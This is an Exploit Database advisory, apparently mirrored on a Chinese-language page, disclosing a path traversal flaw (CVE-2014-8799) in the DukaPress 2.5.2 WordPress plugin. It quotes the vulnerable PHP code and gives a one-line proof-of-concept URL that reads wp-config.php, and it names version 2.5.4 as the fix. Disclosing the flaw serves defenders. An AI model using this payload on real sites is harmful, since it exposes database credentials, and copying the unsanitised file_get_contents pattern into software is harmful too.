WordPress Plugin DukaPress 2.5.2 – Directory Traversal

• Exploit Database
• 39 阅读

• 作者： Kacper Szurek
  日期： 2014-11-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35346/

• # Exploit Title: DukaPress 2.5.2 Path Traversal
  # Date: 27-10-2014
  # Exploit Author: Kacper Szurek - http://security.szurek.pl
  # Software Link: https://downloads.wordpress.org/plugin/dukapress.2.5.2.zip
  # Category: webapps
  # CVE: CVE-2014-8799
  
  1. Description
  
  dp_img_resize() returns $_REQUEST['src'] if $_REQUEST['w'] and $_REQUEST['h'] doesn't exist.
  
  File: dukapress\lib\dp_image.php
  if (!function_exists('add_action')) {
  require_once('../../../../wp-load.php');
  }
  
  echo file_get_contents(dp_img_resize('', $_REQUEST['src'],$_REQUEST['w'], $_REQUEST['h']));
   
  http://security.szurek.pl/dukapress-252-path-traversal.html
  
  2. Proof of Concept
  
  http://wordpress-url/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
  
  3. Solution:
  
  Update to version 2.5.4
  
  https://downloads.wordpress.org/plugin/dukapress.2.5.4.zip
  https://plugins.trac.wordpress.org/changeset/1024640/dukapress